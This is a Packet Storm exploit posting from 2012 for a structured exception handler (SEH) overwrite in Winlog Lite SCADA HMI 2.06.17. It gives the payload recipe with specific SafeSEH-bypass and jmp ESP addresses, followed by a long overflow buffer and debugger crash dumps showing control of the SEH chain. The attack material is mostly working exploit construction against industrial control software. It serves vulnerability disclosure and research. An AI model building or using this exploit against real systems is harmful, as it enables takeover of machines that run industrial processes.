exploit the possibilities

Winlog Lite SCADA HMI System 2.06.17 SEH Overwrite

Winlog Lite SCADA HMI System 2.06.17 SEH Overwrite
Posted Aug 29, 2012
Authored by Ciph3r

Winlog Lite SCADA HMI system version 2.06.17 suffers from a SEH overwrite vulnerability.

tags | exploit
MD5 | 0835ef58aed4416b07d9dcc746c517af

Winlog Lite SCADA HMI System 2.06.17 SEH Overwrite

Change Mirror Download
######################################################################################
# Vuln Title: Winlog Lite SCADA HMI system SEH 0verwrite Vulnerability
#
# Author: FaryadR (a.k.a Ciph3r)
# tested on : winXp sp3 and Winlog Lite 2.06.17 Version
# Twitter : https://twitter.com/faryadR
# Mail : Ciph3r.secure@gmail.com
# Website : http://0c0c0c0c.com
# Vendor : http://www.sielcosistemi.com
#
#
######################################################################################

[+] Application Description :

Winlog Lite is the entry level version of the SCADA/HMI software Winlog Pro
offered by Sielco Sistemi to allow an evaluation of the potentiality and the
simplicity of use of the package; Winlog Lite is also a powerful and low cost
solution for creation of small supervisory applications.

Winlog Lite makes available most of development tools and functions provided by
the Winlog Pro software package, but limits the possibility to develop and to
run applications up to a max of 24 tags. Winlog Lite does not include Symbol
Factory library and web support.

Winlog Lite can be executed both in Demo mode (without need of registration)
and Full mode; in Demo mode, communication with external devices and sampling
of external tags automatically stops after 15 minutes (if required, it can be
restarted manually); in Full mode communication goes on without any limit of time.

[+]Proof Of Concept :

After run Winlog Lite SCADA HMI SYSTEM go to Tools Menu and Application Builder
So , we can injected our Data to Application Name and Select Build Bottom
after attach program to debugger :

9986 byte A + Pointer to next SEH record (6 byte jmp) +
SE handler --> Non-SafeSEH Address for bypass SafeSEH Protection(0x32450A7B) + NOP + jmp ESP (0x7C86467B) + shellcode

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA



00385319 90 NOP
0038531A 90 NOP
0038531B 90 NOP
0038531C 55 PUSH EBP
0038531D 8BEC MOV EBP,ESP
0038531F 53 PUSH EBX
00385320 8B00 MOV EAX,DWORD PTR DS:[EAX]
00385322 8B12 MOV EDX,DWORD PTR DS:[EDX]
00385324 E8 AD020000 CALL <JMP.&Vcl40.@System@@LStrCmp$qqrv>
00385329 0F94C0 SETE AL
0038532C 83E0 01 AND EAX,1
0038532F 5B POP EBX
00385330 5D POP EBP
00385331 C3 RETN
00385332 90 NOP
00385333 90 NOP
00385334 55 PUSH EBP
00385335 8BEC MOV EBP,ESP
00385337 53 PUSH EBX
00385338 8B00 MOV EAX,DWORD PTR DS:[EAX] --------> Crashed!
0038533A 8B12 MOV EDX,DWORD PTR DS:[EDX]
0038533C E8 95020000 CALL <JMP.&Vcl40.@System@@LStrCmp$qqrv>
00385341 0F95C0 SETNE AL
00385344 83E0 01 AND EAX,1
00385347 5B POP EBX
00385348 5D POP EBP
00385349 C3 RETN
0038534A 90 NOP
0038534B 90 NOP
0038534C 55 PUSH EBP
0038534D 8BEC MOV EBP,ESP
0038534F 83C4 CC ADD ESP,-34
00385352 53 PUSH EBX
00385353 894D F8 MOV DWORD PTR SS:[EBP-8],ECX
00385356 8955 D0 MOV DWORD PTR SS:[EBP-30],EDX
00385359 8BD8 MOV EBX,EAX
0038535B B8 007B3800 MOV EAX,DbfIntf.00387B00
00385360 E8 C3FDFFFF CALL DbfIntf.00385128


[+] Attributes: thunk

; __fastcall Dbf_fields::TDbfFieldDefs::TDbfFieldDefs(Classes::TPersistent *)
@Dbf_fields@TDbfFieldDefs@$bctr$qqrp19Classes@TPersistent proc near
jmp ds:__imp_@Dbf_fields@TDbfFieldDefs@$bctr$qqrp19Classes@TPersistent ; Dbf_fields::TDbfFieldDefs::TDbfFieldDefs(Classes::TPersistent *)
@Dbf_fields@TDbfFieldDefs@$bctr$qqrp19Classes@TPersistent endp



(1cec.1e7c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=41414141 ebx=00000000 ecx=00000000 edx=0012cae4 esi=0012cb74 edi=41414141
eip=00385338 esp=0012ca94 ebp=0012ca98 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
*** WARNING: Unable to verify checksum for C:\Program Files\Winlog Lite\Bin\DbfIntf.dll
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Winlog Lite\Bin\DbfIntf.dll -
DbfIntf!Dbf_fieldsTDbfFieldDefs$bdtr$qqrv+0x86c:
00385338 8b00 mov eax,dword ptr [eax] ds:0023:41414141=????????

0:000> u
DbfIntf!Dbf_fieldsTDbfFieldDefs$bdtr$qqrv+0x86c:
00385338 8b00 mov eax,dword ptr [eax]
0038533a 8b12 mov edx,dword ptr [edx]
0038533c e895020000 call DbfIntf!Dbf_fieldsTDbfFieldDefs$bdtr$qqrv+0xb0a (003855d6)
00385341 0f95c0 setne al
00385344 83e001 and eax,1
00385347 5b pop ebx
00385348 5d pop ebp
00385349 c3 ret

0:000> !exchain
0012caac: DbfIntf!Dbf_fieldsTDbfFieldDefs$bdtr$qqrv+e6e (0038593a)
0012cb24: DbfIntf!Dbf_fieldsTDbfFieldDefs$bdtr$qqrv+e6e (0038593a)
0012f2ec: <Unloaded_s.dll>+43434342 (43434343)
Invalid exception stack at 42424242


0:000> kb
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
0012ca98 003816dd 41414141 0012cba0 00000000 DbfIntf!Dbf_fieldsTDbfFieldDefs$bdtr$qqrv+0x86c
0012caf4 0038219f 0012cb70 41414141 0012cb74 DbfIntf+0x16dd
*** WARNING: Unable to verify checksum for C:\Program Files\Winlog Lite\Bin\ABuilder.exe
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Winlog Lite\Bin\ABuilder.exe -
0012cb80 00404098 41414141 00000001 0012cba0 DbfIntf!DbiCreateTable+0xf3
0012f314 41414141 41414141 41414141 41414141 ABuilder!FormsTForm$bdtr$qqrv+0x15f4
0012f318 41414141 41414141 41414141 41414141 <Unloaded_s.dll>+0x41414140
0012f31c 41414141 41414141 41414141 41414141 <Unloaded_s.dll>+0x41414140
0012f320 41414141 41414141 41414141 41414141 <Unloaded_s.dll>+0x41414140
0012f324 41414141 41414141 41414141 41414141 <Unloaded_s.dll>+0x41414140
0012f328 41414141 41414141 41414141 41414141 <Unloaded_s.dll>+0x41414140
0012f32c 41414141 41414141 41414141 41414141 <Unloaded_s.dll>+0x41414140
0012f330 41414141 41414141 41414141 41414141 <Unloaded_s.dll>+0x41414140
0012f334 41414141 41414141 41414141 41414141 <Unloaded_s.dll>+0x41414140
0012f338 41414141 41414141 41414141 41414141 <Unloaded_s.dll>+0x41414140
0012f33c 41414141 41414141 41414141 41414141 <Unloaded_s.dll>+0x41414140
0012f340 41414141 41414141 41414141 41414141 <Unloaded_s.dll>+0x41414140
0012f344 41414141 41414141 41414141 41414141 <Unloaded_s.dll>+0x41414140
0012f348 41414141 41414141 41414141 41414141 <Unloaded_s.dll>+0x41414140
0012f34c 41414141 41414141 41414141 41414141 <Unloaded_s.dll>+0x41414140
0012f350 41414141 41414141 41414141 41414141 <Unloaded_s.dll>+0x41414140
0012f354 41414141 41414141 41414141 41414141 <Unloaded_s.dll>+0x41414140



[+] 0verwrite SEH Pointer :


0012F2D4 41414141 AAAA
0012F2D8 41414141 AAAA
0012F2DC 41414141 AAAA
0012F2E0 41414141 AAAA
0012F2E4 41414141 AAAA
0012F2E8 41414141 AAAA
0012F2EC 42424242 BBBB Pointer to next SEH record
0012F2F0 43434343 CCCC SE handler
0012F2F4 41414141 AAAA
0012F2F8 41414141 AAAA
0012F2FC 41414141 AAAA
0012F300 41414141 AAAA
0012F304 41414141 AAAA
0012F308 41414141 AAAA
0012F30C 41414141 AAAA

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

February 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    22 Files
  • 2
    Feb 2nd
    9 Files
  • 3
    Feb 3rd
    2 Files
  • 4
    Feb 4th
    15 Files
  • 5
    Feb 5th
    50 Files
  • 6
    Feb 6th
    24 Files
  • 7
    Feb 7th
    15 Files
  • 8
    Feb 8th
    6 Files
  • 9
    Feb 9th
    1 Files
  • 10
    Feb 10th
    1 Files
  • 11
    Feb 11th
    22 Files
  • 12
    Feb 12th
    25 Files
  • 13
    Feb 13th
    16 Files
  • 14
    Feb 14th
    32 Files
  • 15
    Feb 15th
    15 Files
  • 16
    Feb 16th
    10 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    0 Files
  • 20
    Feb 20th
    0 Files
  • 21
    Feb 21st
    0 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close